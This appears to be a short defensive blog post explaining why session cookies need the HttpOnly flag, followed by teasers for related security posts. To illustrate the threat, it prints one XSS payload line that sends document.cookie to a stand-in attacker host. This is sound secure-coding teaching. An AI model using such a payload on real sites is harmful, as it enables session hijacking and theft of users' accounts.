Why You Must Set the HttpOnly Flag on Session Cookies
A single Cross-Site Scripting (XSS) vulnerability can compromise every user session if your cookies aren't secured.
If your frontend code (JavaScript) can read your session cookie via document.cookie, so can an attacker.
If you have an XSS vulnerability (e.g., you rendered user input without escaping it), the attacker can inject a script:
fetch('https://attacker.com/steal?cookie=' + btoa(document.cookie));
Your user's session is now compromised.
The Fix:
Always set the HttpOnly flag on session cookies. This tells the browser: "Do not let JavaScript access this cookie under any circumstances." The browser will still automatically attach it to outgoing HTTP requests, so your auth still works, but it is invisible to XSS payloads.
Tags
Related Blogs
Beyond JWTs: Designing a Stateful, High-Performance Session Architecture
Stateless JWTs are great until you need to instantly revoke a compromised session. Here's how to build a stateful, Redis-backed authentication system that handles 50k+ concurrent users with sub-millisecond validation.
Defending Against SSRF in Node.js Microservices
Server-Side Request Forgery is deadly. If your app fetches URLs provided by users, you are at risk. Here's how to lock down node-fetch and axios.
Refresh token rotation — how to detect theft in a single round-trip
Most JWT tutorials skip the hard part: what happens when a refresh token is stolen? Here's how to detect reuse, revoke session families, and do it in under 5ms.